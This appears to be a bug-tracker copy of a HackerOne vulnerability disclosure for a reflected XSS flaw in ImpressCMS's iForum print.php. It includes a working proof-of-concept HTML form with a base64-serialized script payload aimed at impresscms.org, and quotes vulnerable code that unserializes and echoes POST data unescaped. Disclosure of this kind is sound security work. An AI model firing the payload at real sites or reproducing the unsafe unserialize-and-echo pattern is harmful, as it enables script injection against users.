-
Notifications
You must be signed in to change notification settings - Fork 2
Open
Description
Link: https://hackerone.com/reports/1050605
Date: 2020-12-04 14:13:51 UTC
By: hackerone_success
Weakness: Cross-site Scripting (XSS) - Reflected
Details:
Hi! In module iforum XSS.
Any can download this module from
https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Modules/iForum/
You need login in tested account on CMS (any). Run and click submit.
<html>
<form name=poc_xss_iforum action='https://www.impresscms.org/modules/iforum/print.php' method=post>
<input type=hidden name=action value=upgrade>
<input type=hidden name="post_data" value='YTo0OntzOjM6InVybCI7czoyNToiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiI7aTowO3M6NDoidGV4dCI7aToxO3M6NjoiYXV0aG9yIjtpOjI7czo0OiJkYXRlIjt9123'>
<!-- echo base64_encode(serialize(['url' => '<script>alert(1)</script>','text','author', 'date'])); -->
<input type=submit>
</form>
</html>
Vulnerable code
$post_data = unserialize(base64_decode($_POST["post_data"]));
below
<p>"._MD_COMEFROM . " ".$post_data["url"]."</p>
PoC on site https://www.impresscms.org demonstrated
{F1104005}
Impact
XSS